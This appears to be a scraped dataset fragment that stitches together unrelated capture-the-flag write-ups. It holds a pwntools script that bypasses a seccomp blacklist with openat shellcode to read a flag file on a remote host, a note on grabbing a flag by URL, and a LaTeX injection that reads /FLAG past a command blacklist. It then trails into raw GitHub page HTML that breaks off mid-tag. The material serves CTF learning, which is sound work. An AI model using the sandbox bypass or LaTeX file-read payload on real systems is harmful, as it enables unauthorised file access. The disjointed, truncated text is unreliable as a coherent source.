text_chunk
stringlengths
151
703k
```#! /usr/bin/python3 """Using ./seccomp-tools dump ./filename line CODE JT JF K================================= 0000: 0x20 0x00 0x00 0x00000004 A = arch 0001: 0x15 0x00 0x0b 0xc000003e if (A != ARCH_X86_64) goto 0013 0002: 0x20 0x00 0x00 0x00000000 A = sys_number 0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005 0004: 0x15 0x00 0x08 0xffffffff if (A != 0xffffffff) goto 0013 0005: 0x15 0x07 0x00 0x00000002 if (A == open) goto 0013 0006: 0x15 0x06 0x00 0x00000038 if (A == clone) goto 0013 0007: 0x15 0x05 0x00 0x00000039 if (A == fork) goto 0013 0008: 0x15 0x04 0x00 0x0000003a if (A == vfork) goto 0013 0009: 0x15 0x03 0x00 0x0000003b if (A == execve) goto 0013 0010: 0x15 0x02 0x00 0x00000065 if (A == ptrace) goto 0013 0011: 0x15 0x01 0x00 0x00000142 if (A == execveat) goto 0013 0012: 0x06 0x00 0x00 0x7fff0000 return ALLOW 0013: 0x06 0x00 0x00 0x00000000 return KILL - We can see that some of the syscalls were blacklisted, but openat() syscall was not blacklisted, therefore we can leverage that for our advantage.- Openat() requires the full path of the file as its argument and the code is as follows.""" from pwn import * context.clear(arch="amd64") # generate shellcode using openat() minimum fd returned is (3) shellcode = shellcraft.linux.openat(-1, "/home/ctf/flag.txt")shellcode += shellcraft.linux.read(3, 'rsp', 80)shellcode += shellcraft.linux.write(1, 'rsp', 80) def main(): io = remote("20.216.39.14", 1236) io.sendline(asm(shellcode)) io.interactive() if __name__ == "__main__": main() ```
The challenge website is here http://52.59.124.14:10005/ I just add /flag to the url http://52.59.124.14:10005/FLAG Then I got the flag ENO\{L4T3x\_H4ck1Ng\_R3L04D3D\_OK!}
## Texnology> Online LaTeX editors are quite famous now, but are the associated risks as well?Hint: The flag is at `/FLAG.` ### What's going on?We have this website, which compiles LaTeX code from the text area and executes it on a remote server. If the syntax is valid, a link with the compiled PDF appears on the website. ### The solutionWe googled *LaTeX command injection* and we found out [this interesting website](https://0day.work/hacking-with-latex/), which shows some ways to do command injection. We also discovered LaTeX is a Turing complete programming language and it allows us to perform operations, e.g. File I/O. Some operations were blacklisted (e.g. `\immediate`), but we tried other operations, like this one, which worked: ```tex\newread\file\openin\file=/FLAG\read\file to\line\text{\line}\closein\file```
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/wiki-b72b6de22521.css" /> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_clipboard-copy-element_dist_index_esm_js-node_modules_github_remo-8e6bec-232430bfe6da.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_scroll-anchoring_di-e71893-cc1b30c51a28.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_diffs_blob-lines_ts-app_assets_modules_github_diffs_linkable-line-n-f96c66-97aade341120.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/diffs-3a64c1f69a81.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wiki-1423a5c9ebf5.js"></script> <title>Space Heroes CTF : Easy Crypto Challenge · not1cyyy/CTF-Writeups Wiki · GitHub</title> <meta name="route-pattern" content="/:user_id/:repository/wiki/:id(.:format)"> <meta name="current-catalog-service-hash" content="27690012a2eb28b75d0bacab0f2c11870266e8db9e019fa71fea812b82397bd6"> <meta name="request-id" content="8186:12398:1A9E0F9F:1B6EBEED:64121B9A" data-pjax-transient="true"/><meta name="html-safe-nonce" content="001072af9c0d9e3f461c8e3867675b0f3f87c3c63a789ba3f54b82a2f68b124e" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiI4MTg2OjEyMzk4OjFBOUUwRjlGOjFCNkVCRUVEOjY0MTIxQjlBIiwidmlzaXRvcl9pZCI6IjcwMzYxMzIzMTM1MjEwNjg5NTMiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="61c7e450bf53499e3bcca87787f37ef0a34d7dc45ab6d39c7b8915665e2ccb12" data-pjax-transient="true"/> <meta name="hovercard-subject-tag" content="repository:481769760" data-turbo-transient> <meta name="github-keyboard-shortcuts" content="repository" data-turbo-transient="true" /> <meta name="selected-link" value="repo_wiki" data-turbo-transient> <meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I"> <meta name="octolytics-url" content="https://collector.github.com/github/collect" /> <meta name="analytics-location" content="/<user-name>/<repo-name>/wiki/show" data-turbo-transient="true" /> <meta name="user-login" content=""> <meta name="viewport" content="width=device-width"> <meta name="description" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/e171482900f0c3d46b31f49340e572ecc31e0ee3e562f7133c521eed126b0881/not1cyyy/CTF-Writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="Space Heroes CTF : Easy Crypto Challenge" /><meta name="twitter:description" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/e171482900f0c3d46b31f49340e572ecc31e0ee3e562f7133c521eed126b0881/not1cyyy/CTF-Writeups" /><meta property="og:image:alt" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="Space Heroes CTF : Easy Crypto Challenge" /><meta property="og:url" content="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Easy-Crypto-Challenge" /><meta property="og:description" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/"> <meta name="hostname" content="github.com"> <meta name="expected-hostname" content="github.com"> <meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS"> <meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload"> <meta name="turbo-cache-control" content="no-preview" data-turbo-transient=""> <meta name="go-import" content="github.com/not1cyyy/CTF-Writeups git https://github.com/not1cyyy/CTF-Writeups.git"> <meta name="octolytics-dimension-user_id" content="101048320" /><meta name="octolytics-dimension-user_login" content="not1cyyy" /><meta name="octolytics-dimension-repository_id" content="481769760" /><meta name="octolytics-dimension-repository_nwo" content="not1cyyy/CTF-Writeups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="481769760" /><meta name="octolytics-dimension-repository_network_root_nwo" content="not1cyyy/CTF-Writeups" /> <meta name="turbo-body-classes" content="logged-out env-production page-responsive"> <meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats"> <meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors"> <meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors"> <link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg"> <meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" /> <link rel="manifest" href="/manifest.json" crossOrigin="use-credentials"> </head> <body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button> <div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <div class="flex-1"> Sign up </div> <div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div> <div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 